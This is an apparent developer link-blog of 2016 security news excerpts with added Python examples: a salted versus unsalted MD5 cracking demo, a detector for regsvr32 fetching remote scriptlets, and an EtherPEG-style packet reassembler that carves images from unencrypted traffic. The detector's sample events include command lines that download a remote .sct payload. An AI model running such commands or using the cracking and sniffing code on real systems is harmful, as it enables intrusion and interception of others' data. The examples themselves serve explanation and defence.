Tighten Pro
C/C++/Cocoa tool for codesign security, Developer ID, & Mac App Store Receipt Validation


4.29.2016
Mac Developer: In a first, US military plans to drop “cyberbombs” on ISIS, NYT says | Ars Technica

In a first, US military plans to drop “cyberbombs” on ISIS, NYT says | Ars Technica: "Opening a new front in its campaign to defeat Islamic State terrorists, the US military has for the first time directed its Cyber Command to mount hacking attacks against ISIS computers and networks, The New York Times reported Sunday."
This may lead to a sadly unexpected escalation that affects many ordinary people.

By: Tighten

4.28.2016
Mac Developer: Blame the victim: Report shows fifth of breaches caused by “miscellaneous errors” | Ars Technica

Blame the victim: Report shows fifth of breaches caused by “miscellaneous errors” | Ars Technica: "In cases where malware or hacking was used to get in the door, "zero day" vulnerabilities played a microscopic role. The vast majority of breaches involving exploiting bugs in software went after known vulnerabilities—and just 10 vulnerabilities accounted for 85 percent of exploit attacks (though the list of top vulnerabilities has been called into question by some observers)."
Social hacking has always been dominant. Probably, if someone was good enough to gain access to your systems through a zero-day exploit, you wouldn't know about it, unless they were using a purchased toolkit written by someone else.


4.27.2016
Mac Developer: 7 million unsalted MD5 passwords leaked by Minecraft community Lifeboat | Ars Technica

7 million unsalted MD5 passwords leaked by Minecraft community Lifeboat | Ars Technica: "E-mail addresses and hashed passwords for 7 million Lifeboat accounts. The mass compromise was discovered by Troy Hunt, the security researcher behind the Have I been pwned? breach notification site. Hunt said he had acquired the data from someone actively involved in trading hacked login credentials who has provided similar data in the past."
Have you been owned? Yes, in fact, you have.
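What "unsalted MD5" means for the people trading that dump, shown as an added example (not code from the post or from Lifeboat): with no salt, one precomputed table of hashes answers every account at once, and any two users who chose the same password are visible as identical rows. The accounts, passwords and wordlist below are constructed for the demonstration.

```python
import hashlib
import os

# Constructed accounts, not Lifeboat's data: what each user chose as a password.
USERS = [
    ("alice@example.com", "password"),
    ("bob@example.com", "123456"),
    ("carol@example.com", "password"),
    ("dave@example.com", "correct horse battery staple"),
]

# A tiny candidate list; real attackers precompute hundreds of millions of these.
WORDLIST = ["123456", "password", "qwerty", "letmein"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def unsalted_dump(users):
    """Rows as the leak had them: email plus md5(password), no salt."""
    return [(email, md5_hex(pw.encode())) for email, pw in users]


def salted_dump(users, salt_bytes=16):
    """Rows with a random per-account salt folded into the hash."""
    rows = []
    for email, pw in users:
        salt = os.urandom(salt_bytes).hex()
        rows.append((email, salt, md5_hex((salt + pw).encode())))
    return rows


def duplicate_hashes(rows):
    """Accounts whose hash equals another account's; the hash is the last field of a row."""
    seen = {}
    for row in rows:
        seen.setdefault(row[-1], []).append(row[0])
    return {h: emails for h, emails in seen.items() if len(emails) > 1}


def crack_unsalted(rows, wordlist):
    """One precomputed table answers every account in the dump.
    Returns (cracked, hashes_computed)."""
    table = {md5_hex(w.encode()): w for w in wordlist}
    cracked = {email: table[h] for email, h in rows if h in table}
    return cracked, len(wordlist)


def crack_salted(rows, wordlist):
    """The salt defeats the shared table: every account costs a fresh pass over the wordlist.
    Returns (cracked, hashes_computed)."""
    cracked, computed = {}, 0
    for email, salt, h in rows:
        for w in wordlist:
            computed += 1
            if md5_hex((salt + w).encode()) == h:
                cracked[email] = w
                break
    return cracked, computed


if __name__ == "__main__":
    plain = unsalted_dump(USERS)
    salted = salted_dump(USERS)
    print("unsalted duplicates:", duplicate_hashes(plain))   # alice and carol share a hash
    print("salted duplicates:", duplicate_hashes(salted))    # none
    print("unsalted:", crack_unsalted(plain, WORDLIST))
    print("salted:", crack_salted(salted, WORDLIST))
```

The salted run still recovers the weak passwords, only at a cost that grows with the number of accounts instead of staying flat; MD5 itself is fast enough that this barely slows a GPU down. The fix is a salt plus a deliberately slow password hash (bcrypt, scrypt or Argon2), not a salt alone.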


Mac Developer: Boffins believe buggy Binder embiggens Android attack surface • The Register

Boffins believe buggy Binder embiggens Android attack surface • The Register: "The paper notes that “private APIs” in Android – APIs that aren't documented for third-party developers – are a security problem. Since they're unknown, they don't get checked or tested.

Another architectural issue the paper cites is that de-serialisation is “assumed to be always undisturbed”, another assumption that depends on the validity of the client-side transaction."
Reminiscent of the XPC exploit that could be used to root Apple devices. Security "features".


Mac Developer: Hacking group “PLATINUM” used Windows’ own patching system against it | Ars Technica

Hacking group “PLATINUM” used Windows’ own patching system against it | Ars Technica: "In 2006, Alex Sotirov gave a presentation at Black Hat that briefly described how Windows' hotpatching worked in the context of a description of how third parties had offered some quick patches for Windows flaws while waiting for Microsoft's official fixes. A more thorough description was given by Alex Ionescu at SyScan 2013. Ionescu's talk wasn't just about how hotpatching was implemented, but described ways that attackers could use it to modify running systems to inject malware without having to write the malware to disk or inject DLLs, both of which are visible to anti-malware software and humans alike."
The joys of a monoculture. It's like a petri dish where microbes flourish.


4.25.2016
Mac Developer: Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches | Ars Technica

Billion dollar Bangladesh hack: SWIFT software hacked, no firewalls, $10 switches | Ars Technica: "The Bangladesh central bank had no firewall and was using a second-hand $10 network when it was hacked earlier this year. Investigation by British defense contractor BAE Systems has also shown that the SWIFT software used to make payments was compromised, enabling the hackers to send money around the world without leaving any trace in Bangladesh."
No commentary required.


Mac Developer: Exploit gets around Windows' app security safeguards

Exploit gets around Windows' app security safeguards: "Researcher Casey Smith has discovered a vulnerability in Windows that gets around this barrier. If you tell Regsvr32 to point to a remotely hosted file (such as a script), you can make a system run whichever app you want -- just what hackers and virus writers are looking for."
I leak, you leak, we all leak together.
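The defensive side of the Regsvr32 trick, as an added example rather than anything from the post or from Casey Smith: a small detector run over process-creation records that flags regsvr32.exe whenever its command line hands it a remote URL, which is the one property the excerpt actually describes. The post gives no command, so the shape of the flagged lines (the /i: switch pointing at a URL while scrobj.dll, the scriptlet COM server, is loaded) is taken from public write-ups of the technique and is an assumption here; the event records are constructed.

```python
import re

# Any http/https/ftp URL, stopping at whitespace or a closing quote.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# The Windows scriptlet COM server; its appearance on a regsvr32 command line
# is an assumption taken from public descriptions of the technique, not from the post.
SCRIPT_HOST_DLL = "scrobj.dll"


def image_name(path: str) -> str:
    """Basename of an image path, normalised for slashes and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons a process-creation event looks like regsvr32 fetching
    remote content; an empty list means nothing suspicious was seen."""
    if image_name(event["image"]) != "regsvr32.exe":
        return []
    reasons = []
    cmd = event["cmd"]
    m = URL_RE.search(cmd)
    if m:
        reasons.append(f"remote URL in regsvr32 command line: {m.group(0)}")
    if SCRIPT_HOST_DLL in cmd.lower():
        reasons.append("regsvr32 asked to load the scriptlet host DLL")
    return reasons


def scan(events):
    """Return [(host, cmd, reasons)] for every flagged event, in input order."""
    hits = []
    for e in events:
        reasons = classify(e)
        if reasons:
            hits.append((e["host"], e["cmd"], reasons))
    return hits


# Constructed process-creation records (no real host produced these).
EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"host": "ws02", "image": r"C:\Windows\SysWOW64\REGSVR32.EXE",
     "cmd": r"REGSVR32.EXE /s /n /u /i:HTTP://203.0.113.7/update.sct scrobj.dll"},
    {"host": "ws03", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32 /s /i:"https://203.0.113.7/a.sct" C:\Windows\System32\scrobj.dll'},
    {"host": "ws04", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "ws05", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /u C:\Temp\old.dll"},
]

if __name__ == "__main__":
    for host, cmd, reasons in scan(EVENTS):
        print(host, "|", cmd, "|", "; ".join(reasons))
```

Ordinary driver and plugin installs (ws01, ws05) register a local DLL and pass; the two flagged records differ in case, architecture directory and quoting, which is why the matching is done on the normalised basename and a case-insensitive URL pattern rather than on one literal string.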


4.24.2016
Mac Developer: EtherPEG

EtherPEG: "EtherPEG works by capturing unencrypted TCP packets off your local network, collecting packets into groups based on TCP connection (determined from source IP address, destination IP address, source TCP port and destination TCP port), reassembling those packets into order based on TCP sequence number, and then scanning the resulting data for byte sequences that suggest the presence of JPEG or GIF data."
Some familiar characters and their mischief.
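The pipeline the excerpt describes, written out as an added example (this is not EtherPEG's code): segments are grouped by the TCP 4-tuple, ordered by sequence number with duplicate and overlapping retransmissions trimmed, and the reassembled bytes are then carved for JPEG (SOI to EOI marker) and GIF (signature to trailer) runs. The example goes a little beyond the text by handling out-of-order delivery, a retransmitted segment and a missing segment. The packets are constructed in the block rather than sniffed, so it runs offline; the marker constants are the real file-format values.

```python
import collections

# Byte patterns EtherPEG-style carving looks for: JPEG start/end-of-image markers,
# GIF signature and trailer. These are the real file-format constants.
JPEG_SOI, JPEG_EOI = b"\xff\xd8\xff", b"\xff\xd9"
GIF_SIGS, GIF_TRAILER = (b"GIF87a", b"GIF89a"), b";"


def reassemble(packets):
    """Group segments by TCP 4-tuple and stitch payloads in sequence order.
    packets: iterable of (src_ip, src_port, dst_ip, dst_port, seq, payload).
    Overlapping retransmissions are trimmed; a gap ends the stream early."""
    by_flow = collections.defaultdict(list)
    for src_ip, sport, dst_ip, dport, seq, payload in packets:
        by_flow[(src_ip, sport, dst_ip, dport)].append((seq, payload))
    streams = {}
    for flow, segs in by_flow.items():
        segs.sort(key=lambda s: s[0])
        buf = bytearray()
        expected = segs[0][0]
        for seq, payload in segs:
            if seq > expected:          # missing segment: stop rather than glue across the hole
                break
            skip = expected - seq       # bytes already copied from an earlier or duplicate segment
            if skip < len(payload):
                buf += payload[skip:]
                expected = seq + len(payload)
        streams[flow] = bytes(buf)
    return streams


def carve_images(stream):
    """Return [(kind, blob)] for every JPEG- or GIF-looking run in the bytes.
    Like the original, this is a heuristic: it trusts the first trailer it sees."""
    found, pos = [], 0
    while True:
        cands = [(stream.find(JPEG_SOI, pos), "jpeg", len(JPEG_SOI), JPEG_EOI)]
        cands += [(stream.find(sig, pos), "gif", len(sig), GIF_TRAILER) for sig in GIF_SIGS]
        cands = [c for c in cands if c[0] != -1]
        if not cands:
            return found
        start, kind, hdr_len, end_marker = min(cands)
        end = stream.find(end_marker, start + hdr_len)
        if end == -1:                   # truncated image: stream ended before its trailer
            return found
        end += len(end_marker)
        found.append((kind, stream[start:end]))
        pos = end


def carve_capture(packets):
    """Whole pipeline: flow -> list of carved (kind, blob)."""
    return {flow: carve_images(data) for flow, data in reassemble(packets).items()}


# --- constructed sample traffic (not a real capture) ---
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + bytes(range(32)) + b"\xff\xd9"
SAMPLE_GIF = b"GIF89a\x08\x00\x08\x00\x80\x00\x00" + bytes(range(16)) + b";"


def segments(flow, seq0, data, mss):
    """Split data into TCP-style segments of at most mss bytes for one flow."""
    return [flow + (seq0 + off, data[off:off + mss]) for off in range(0, len(data), mss)]


def sample_capture():
    """Two HTTP responses: a JPEG delivered out of order with one retransmitted segment,
    interleaved with a GIF on a second connection."""
    jpeg_flow = ("10.0.0.5", 80, "10.0.0.9", 51000)
    gif_flow = ("10.0.0.6", 80, "10.0.0.9", 51001)
    a = segments(jpeg_flow, 1000, b"HTTP/1.0 200 OK\r\nContent-Type: image/jpeg\r\n\r\n" + SAMPLE_JPEG, 16)
    b = segments(gif_flow, 5000, b"HTTP/1.0 200 OK\r\nContent-Type: image/gif\r\n\r\n" + SAMPLE_GIF, 20)
    return a[2:] + [a[1], a[0]] + b + [a[3]]   # a[3] arrives twice


if __name__ == "__main__":
    for flow, images in carve_capture(sample_capture()).items():
        for kind, blob in images:
            print(flow, kind, len(blob), "bytes")
```

Two things are worth noticing. The JPEG marker straddles segment boundaries, so carving only works on the reassembled stream, not on individual packets; and the whole thing depends on the traffic being unencrypted, which is the point the excerpt makes and the reason TLS on the wire is the defence.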


Mac Developer: Managing Subscriptions with In-App Purchase - WWDC 2012 - Videos - Apple Developer

An oldie, but goodie.


Mac Developer: Facebook was the victim of a backdoor hack

Facebook was the victim of a backdoor hack: "Devcore's Orange Tsai recently discovered that someone had installed a backdoor on one of Facebook's corporate servers (that is, not the social network itself) in a bid to swipe workers' login details."
And what are mere mortals to do?


4.23.2016
Mac Developer: Congress asks the NSA how often it spies on Americans

Congress asks the NSA how often it spies on Americans: "Thanks in part to leaks, it's no secret that the National Security Agency's foreign intelligence gathering also covers some Americans. But just how many Americans are under watch, and how many are simply innocents caught in the crossfire? Congress wants to find out. The House Judiciary Committee has sent a letter giving Director of National Intelligence James Clapper until May 6th to provide a "rough estimate" of how many Americans are swept up in spying under the Foreign Intelligence Surveillance Act."
Wild Bill Lawless, as sheriff of these parts, I give you just 27 years to get outta town.


4.22.2016
Mac Developer: “Nuclear” exploit kit service cashes in on demand from cryptoransomware rings | Ars Technica

“Nuclear” exploit kit service cashes in on demand from cryptoransomware rings | Ars Technica: "Security researchers at Cisco Talos and Check Point have published reports detailing the inner workings of Nuclear, an 'exploit kit' Web service that deployed malware onto victims' computers through malicious websites. While a significant percentage of Nuclear's infrastructure has been recently disrupted, the exploit kit is still operating—and looks to be a major contributor to the current crypto-ransomware epidemic."
Somehow, after I deleted it, Flash was on my machine again.


Mac Developer: Brazen no more, makers of account-draining bank trojan get 24 years | Ars Technica

Brazen no more, makers of account-draining bank trojan get 24 years | Ars Technica: "Also providing assistance were researchers from Microsoft’s Digital Crimes Unit, Flashpoint, PhishLabs, Dell SecureWorks, Damballa, and the Norwegian Security Research Team known as "Underworld.no." The arrests came as both men brazenly traveled through places subject to US law-enforcement extradition."
Nice.


Mac Developer: National Security Letters are now constitutional, judge rules | Ars Technica

National Security Letters are now constitutional, judge rules | Ars Technica: "The legal challenge Illston decided stemmed from a challenge brought by the Electronic Frontier Foundation, which was representing two service providers that challenged the NSLs on grounds that the gag requirement illegally limited their rights of speech."
A fight with no winners, only losers.


4.21.2016
Mac Developer: UK intel agencies spy indiscriminately on millions of innocent folks | Ars Technica

UK intel agencies spy indiscriminately on millions of innocent folks | Ars Technica: "The UK's intelligence agencies (MI5, MI6, and GCHQ) are spying on everything you do, and with only the flimsiest of safeguards in place to prevent abuse, according to more than a thousand pages of documents published today as a result of a lawsuit filed by Privacy International."
They know who you liked on Facebook.


4.20.2016
Mac Developer: DRAM bitflipping exploits that hijack computers just got easier | Ars Technica

DRAM bitflipping exploits that hijack computers just got easier | Ars Technica: "New research into the 'Rowhammer' bug that resides in certain types of DDR memory chips raises a troubling new prospect: attacks that use Web applications or booby-trapped videos and documents to trigger so-called bitflipping exploits that allow hackers to take control of vulnerable computers."
Hard to imagine building defences against bugs in the actual hardware.


Mac Developer: Apple-backed coalition opposes Burr-Feinstein encryption bill in open letter

Apple-backed coalition opposes Burr-Feinstein encryption bill in open letter: "A group of four tech industry associations — representing businesses like Apple, Amazon, Microsoft and Google — have published an open letter opposing a draft bill by U.S. Senators Richard Burr and Dianne Feinstein, which would make it possible for courts to order help bypassing encryption."
It may well be that we need an entire generation of legislators to die off before we get the laws that are informed by people who understand what is going on.


4.19.2016
Mac Developer: How hackers eavesdropped on a US Congressman using only his phone number | Ars Technica

How hackers eavesdropped on a US Congressman using only his phone number | Ars Technica: "A US Congressman has learned first-hand just how vulnerable cellphones are to eavesdropping and geographic tracking after hackers were able to record his calls and monitor his movements using nothing more than the public ten-digit phone number associated with the handset he used."
Just when you thought it was safe to go back in the pool.


Mac Developer: How Hacking Team got hacked | Ars Technica

How Hacking Team got hacked | Ars Technica: "On Friday, the self-described black hat hacker who claimed responsibility for the Hacking Team dump last year, and who goes by the handle "Phineas Phisher," published the technical details of how he pulled off the caper—and encouraged others to follow his example."
It's like one guy doing the actual work that the NSA was tasked with.


4.18.2016
Mac Developer: Apple confirms QuickTime for Windows at end of life

Apple confirms QuickTime for Windows at end of life: "Last week software security outfit Trend Micro disclosed the discovery of two new flaws in QuickTime 7 for Windows, saying Apple was informed of the security threats in November. At the time, Apple said it had no plans to issue a patch, adding the software 'would be deprecated on Windows and the vendor would publish removal instructions for users.'"
iTunes is, of course, everything that QuickTime(tm) was, and aspired to be.


Mac Developer: Flashback: Declassified 1970 DOD cybersecurity document still relevant | Ars Technica

Flashback: Declassified 1970 DOD cybersecurity document still relevant | Ars Technica: "The National Security Archives at George Washington University has just added a classic text of computer security to its 'Cyber Vault' project—the original version of what came to be known as the 'Ware Report,' a document published by the predecessor to the Defense Advanced Research Projects Agency in February 1970. And as much as technology has changed in the 46 years that have passed, the Ware Report would still hold up pretty well today with a few notable edits."
We knew exactly what needed to be done but were still unable to do it, because it is possibly an unsolvable problem.


Mac Developer: House votes to undermine net neutrality rules, and ISPs cheer | Ars Technica

House votes to undermine net neutrality rules, and ISPs cheer | Ars Technica: "The "No Rate Regulation of Broadband Internet Access Act" was ostensibly proposed to prevent the FCC from setting the rates charged by Internet providers. But the bill defines "rate regulation" so broadly that FCC Chairman Tom Wheeler says it could prevent the commission from enforcing net neutrality rules against blocking and throttling."
Soon, the USA will be the most technologically-backwards country in the world when it comes to connectivity. Google Fiber notwithstanding.


4.16.2016
Mac Developer: Out-of-date apps put 3 million servers at risk of crypto ransomware infections | Ars Technica

Out-of-date apps put 3 million servers at risk of crypto ransomware infections | Ars Technica: "More than 3 million Internet-accessible servers are at risk of being infected with crypto ransomware because they're running vulnerable software, including out-of-date versions of Red Hat's JBoss enterprise application, researchers from Cisco Systems said Friday."
The joys of monoculture, the ideal petri dish for the epidemic disaster.


4.14.2016
Mac Developer: QuickTime Sandbox Fail

This looks like a security-scoped URL fail. When the sandbox is so restrictive, even Apple can't figure out how to make it work.


Mac Developer: Apple investigating major App Store search changes, mulling paid results, report says

Apple investigating major App Store search changes, mulling paid results, report says: "A report Thursday claims Apple has a 'secret team' working on major user-facing changes to App Store search results, including the possibility of charging developers to promote content. "
I'm looking forward to seeing the Microsoft brand at the top of every search category on the App Store(s). If Google isn't already the way you find relevant content in the App Store, it soon will be.


4.13.2016
Mac Developer: '1970' date bug could be used to wreck pre-iOS 9.3.1 devices over Wi-Fi, researchers say

'1970' date bug could be used to wreck pre-iOS 9.3.1 devices over Wi-Fi, researchers say: "If an iOS device is set to connect to a trusted Wi-Fi network automatically — such as a cable company's free hotspot — a hacker mimicking that network's name can trick a device into setting the wrong time, said Patrick Kelley and Matt Harrigan, cited by Krebs on Security. This is possible because iOS regularly tries to connect to an NTP (network time protocol) server to keep time in sync."
Think of all those wasted hours trying to get useful code running in a sandbox environment. To what end?


Mac Developer: How to install and run Mac apps that don't come from the Mac App Store

How to install and run Mac apps that don't come from the Mac App Store: "Apple has introduced a number of features designed to protect users from malware in OS X, but these tools occasionally go too far when trying to save people from themselves."
Well, as long as the Mac can run really crappy ports of iPad shovel ware, why should anybody complain?



Copyright © 2005-2015
All Rights Reserved
Tighten Pro